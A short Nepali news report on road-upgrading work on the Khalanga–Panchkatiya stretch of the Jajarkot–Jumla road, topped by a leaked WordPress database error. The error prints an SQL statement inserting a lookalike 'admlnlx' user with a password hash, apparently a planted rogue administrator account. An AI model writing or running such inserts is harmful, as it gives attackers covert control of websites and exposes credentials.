WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUPVoR0FQLafgZ/YQ8FRJW5h4Uee4H.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 09:29:27', '', 'admlnlx', 'admlnlx')
जाजरकोट, माघ १८ –
निर्माणाधीन जाजरकोट—जुम्ला सडकको खलङ्गा—पाँचकाटिया सडकखण्डमा स्तरोन्नतिको काम सुरु भएको छ ।
नेकपा ९माओवादी केन्द्र०का नेता पूर्व गृहमन्त्री शक्तिबहादुर बस्नेतले काम छिटो गर्नुहोस् बजेट अभाव हुँदैन भनेपछि स्तरोन्नतिको काम सुरु गरिएको हो । जिल्लाका दर्जनौँ सडकमा अहिले थप बजेटको व्यवस्था समेत गरिएको छ ।
सडक डिभिजनको रु एक करोड ९८ लाख लागतमा सडक निर्माण कार्य सुरु गरिएको छ । सडक निर्माणको जिम्मा मृत सन्जिवनी खड्का कृष्ण जेभी कन्स्ट्रक्सनले लिएको छ । दुई वर्षभित्र निर्माण कार्य सम्पन्न गर्ने गरी काम सुरु गरिएको हो ।
खलङ्गा—पाँचकाटिया सडकखण्डभित्र रहेको २१ किलोमिटर दूरीमा एक लाख ३६ हजार घनमिटर माटो कटिङ, माटो फिलिङलगायतको काम गरिने ठेकेदार रत्न खड्काले बताउनुभयो ।
यो सडकमा जिप र ट्र्याक्टर हिउँदको समयमा गुड्ने गर्दछन् । सडकको स्तर वृद्धि गर्न थालेपछि स्थानीय खुसी भएका छन् । यो सडकमा ट्र्याक ओपन गर्दा २१ किलोमिटरमा रु सात करोडभन्दा बढी खर्च भइसकेको छ । अहिले सडकको स्तर वृद्धि नभएका कारण बर्सेनि स्थानीय समस्या भोग्दै आएका थिए । – रासस